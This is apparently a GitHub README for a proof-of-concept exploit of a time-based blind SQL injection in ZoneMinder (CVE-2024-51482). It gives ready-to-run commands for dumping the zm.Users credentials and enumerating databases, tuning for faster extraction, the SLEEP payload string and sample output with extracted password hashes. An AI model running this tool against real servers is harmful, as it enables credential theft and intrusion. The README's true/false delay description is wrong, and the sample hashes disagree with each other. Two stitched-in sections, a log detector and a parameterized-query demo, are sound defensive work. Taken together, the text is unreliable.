plur1bu5/CVE-2024-51482-PoC
CVE-2024-51482-PoC

Authenticated time-based blind SQL injection exploit for ZoneMinder v1.37.* <= 1.37.64

Overview

This is a proof-of-concept exploit for CVE-2024-51482, a time-based blind SQL injection vulnerability in ZoneMinder's event management functionality. The exploit requires authentication and uses conditional SLEEP queries to extract data from the database.

Features

  • Authenticated exploitation - Login with credentials or session cookie
  • Length detection - Binary search to find exact string length before extraction
  • Parallel extraction - Multi-threaded character extraction for speed
  • sqlmap-style options - Enumerate databases, tables, columns, and dump data
  • Safe defaults - 3s delay, 5 threads for high accuracy
  • Progress tracking - Real-time extraction progress with verbose mode
  • Clean output - Formatted table display for dumped data

Requirements

pip install requests

Quick Start

Default Mode - Dump Credentials

python3 poc.py -t example.local -u admin -p password

With Session Cookie

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Verbose Mode

python3 poc.py -t example.local -u admin -p password -v

Usage

Enumerate Databases

python3 poc.py -t example.local -u admin -p password --dbs

Enumerate Tables

python3 poc.py -t example.local -u admin -p password -D zm --tables

Enumerate Columns

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Dump Specific Table

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Options

Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

Performance Tuning

Safe Mode (Recommended)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Speed: ~2-3 minutes per password hash
  • Accuracy: High

Fast Mode (May have errors)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Speed: ~30-60 seconds per password hash
  • Accuracy: May produce incorrect characters

Example Output

[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

How It Works

  1. Authentication - Logs in with credentials or uses provided session cookie
  2. Vulnerability Test - Confirms target is vulnerable with simple SLEEP payload
  3. Length Detection - Uses binary search to find exact string length
  4. Parallel Extraction - Extracts all character positions simultaneously
  5. Data Display - Formats results in clean table
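What the procedure above looks like from the server side, as an added example that is not part of this repository: the script below scans constructed access-log lines (assumed format: combined log with a trailing response-time-in-milliseconds field; the path /app/events and its id parameter are placeholders, not ZoneMinder's real endpoint) for two signals a defender can act on. The first is a request URI carrying a MySQL delay function (SLEEP from the payload above; BENCHMARK is the other common one). The second is a single client whose latencies to one path split into a fast cluster and a cluster near the configured 3 s delay, which is the footprint that conditional extraction with several parallel threads leaves regardless of how the payload is encoded.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (not taken from the repository or any real server).
# Assumed format: client - - [time] "METHOD URI PROTO" status bytes response_time_ms
# /app/events and id= are placeholders standing in for the vulnerable endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /app/events?id=1 HTTP/1.1" 200 512 41
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /app/events?id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(3-(IF(1=1,0,3)))))test) HTTP/1.1" 200 512 3012
10.0.0.5 - - [01/Jan/2025:10:00:05 +0000] "GET /app/events?id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(3-(IF(1=2,0,3)))))test) HTTP/1.1" 200 512 38
10.0.0.5 - - [01/Jan/2025:10:00:06 +0000] "GET /app/events?id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(3-(IF(2>1,0,3)))))test) HTTP/1.1" 200 512 3008
10.0.0.5 - - [01/Jan/2025:10:00:10 +0000] "GET /app/events?id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(3-(IF(2<1,0,3)))))test) HTTP/1.1" 200 512 44
10.0.0.5 - - [01/Jan/2025:10:00:11 +0000] "GET /app/events?id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(3-(IF(3>1,0,3)))))test) HTTP/1.1" 200 512 3020
10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /app/events?id=7 HTTP/1.1" 200 512 45
10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /app/events?id=8 HTTP/1.1" 200 512 52
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) (?P<ms>\d+)$'
)

# MySQL functions that make a query take measurable time; SLEEP is the one the PoC payload uses.
DELAY_RE = re.compile(r'\b(?:SLEEP|BENCHMARK)\s*\(', re.IGNORECASE)

FAST_MS = 500       # responses below this are "no delay"
SLOW_MS = 2500      # responses at or above this are "delay fired" (tuned for a 3 s delay)
MIN_REQUESTS = 6    # do not judge latency distribution on fewer samples than this


def sample_lines():
    """The constructed log above as a list of lines."""
    return SAMPLE_LOG.strip().splitlines()


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ms"] = int(rec["ms"])
    # Decode percent-encoding so that an encoded SLEEP( is matched like a plain one.
    rec["decoded_uri"] = unquote_plus(rec["uri"])
    rec["path"] = rec["decoded_uri"].split("?", 1)[0]
    return rec


def signature_hits(lines):
    """Return (client, decoded_uri) for every request whose URI contains a delay function."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and DELAY_RE.search(rec["decoded_uri"]):
            hits.append((rec["client"], rec["decoded_uri"]))
    return hits


def bimodal_clients(lines):
    """Return {(client, path): (fast, slow, total)} for client/path pairs whose response
    times cluster both well below and near the delay, the shape of conditional extraction."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            groups[(rec["client"], rec["path"])].append(rec["ms"])
    flagged = {}
    for key, times in groups.items():
        if len(times) < MIN_REQUESTS:
            continue
        fast = sum(1 for t in times if t < FAST_MS)
        slow = sum(1 for t in times if t >= SLOW_MS)
        # Require a real share of both modes; pure slowness is just a slow backend.
        if fast / len(times) >= 0.2 and slow / len(times) >= 0.2:
            flagged[key] = (fast, slow, len(times))
    return flagged


if __name__ == "__main__":
    lines = sample_lines()
    for client, uri in signature_hits(lines):
        print(f"[signature] {client} {uri}")
    for (client, path), (fast, slow, total) in bimodal_clients(lines).items():
        print(f"[timing] {client} -> {path}: {fast} fast / {slow} slow of {total} requests")
```

Signature matching only sees what the log records (query strings on GET requests; POST bodies usually are not logged), so the latency pattern is the more durable of the two signals. Set FAST_MS and SLOW_MS around the delay you expect and MIN_REQUESTS according to normal traffic volume to the path; legitimate clients rarely alternate between near-zero and multi-second responses on the same request.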

Payload Format

The exploit uses conditional SLEEP:

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • TRUE condition: No delay (0 seconds)
  • FALSE condition: Full delay (3 seconds)
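Why this payload works, and what removes the vulnerability class, as an added example that is not part of this repository. Note first that in MySQL IF(condition,0,3) returns 0 when the condition is true, so SLEEP(3-0) sleeps for the full delay on the true branch and SLEEP(3-3) returns at once on the false branch; the mapping in the bullets above holds when the condition is negated, and the defence does not depend on which branch sleeps. The injection succeeds only because the value is spliced into the SQL text, so everything after the leading 1 is parsed as SQL. The script below uses sqlite3 so it runs offline (SQLite has no SLEEP, so a plain boolean condition stands in for the timing oracle; the events table and its rows are constructed and are not ZoneMinder's schema) and shows the vulnerable pattern beside the parameterized form, where the same input is compared as an opaque value and matches nothing.

```python
import re
import sqlite3


def make_db():
    """Constructed sample table standing in for an application's events table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO events VALUES (?, ?)", [(1, "alarm"), (2, "motion")])
    return conn


def lookup_vulnerable(conn, event_id):
    """Vulnerable pattern: the caller-supplied value becomes part of the SQL text, so an
    input such as '1 AND 1=0' rewrites the WHERE clause and the result reveals the
    truth of the injected condition (the oracle a blind injection is built on)."""
    sql = f"SELECT name FROM events WHERE id = {event_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, event_id):
    """Hardened: the value is bound as a parameter. The database never parses it as SQL,
    so '1 AND 1=1' is compared against the integer column as a string and matches no row."""
    rows = conn.execute("SELECT name FROM events WHERE id = ?", (event_id,))
    return [row[0] for row in rows]


def lookup_strict(conn, event_id):
    """Hardened plus input validation: an event id must be a decimal integer, so anything
    else is rejected before it reaches the database at all."""
    if not re.fullmatch(r"[0-9]+", str(event_id)):
        raise ValueError(f"invalid event id: {event_id!r}")
    rows = conn.execute("SELECT name FROM events WHERE id = ?", (int(event_id),))
    return [row[0] for row in rows]


def strict_rejects(conn, value):
    """True if lookup_strict refuses the value (helper so the check is a return value)."""
    try:
        lookup_strict(conn, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    for value in ("1", "1 AND 1=1", "1 AND 1=0"):
        print(f"{value!r:14} vulnerable={lookup_vulnerable(conn, value)} "
              f"bound={lookup_bound(conn, value)} strict_rejects={strict_rejects(conn, value)}")
```

The vulnerable function returns a row for "1 AND 1=1" and nothing for "1 AND 1=0", which is exactly the one-bit answer the PoC measures with SLEEP instead of row counts. Binding alone closes the hole; validating the type as well gives a clean error instead of a silent empty result, which is easier to alert on.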

Troubleshooting

Inaccurate Results

If you get wrong characters (e.g., $ becomes 8):

# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Too Slow

If extraction is too slow:

# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

No Data Found

If default zm.Users doesn't exist:

# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

CVE Information

  • CVE ID: CVE-2024-51482
  • Affected Versions: ZoneMinder v1.37.* <= 1.37.64
  • Fixed In: v1.37.65
  • Vulnerability Type: Time-based Blind SQL Injection
  • CVSS Score: TBD

Disclaimer

This tool is for educational and authorized security testing purposes only.

  • Do not use this tool against systems you do not own or have explicit permission to test
  • Unauthorized access to computer systems is illegal
  • The author is not responsible for any misuse or damage caused by this tool
  • Always obtain proper authorization before conducting security assessments

References

License

This project is provided for educational purposes only. Use responsibly and ethically.


⭐ If you find this useful, please star the repository!
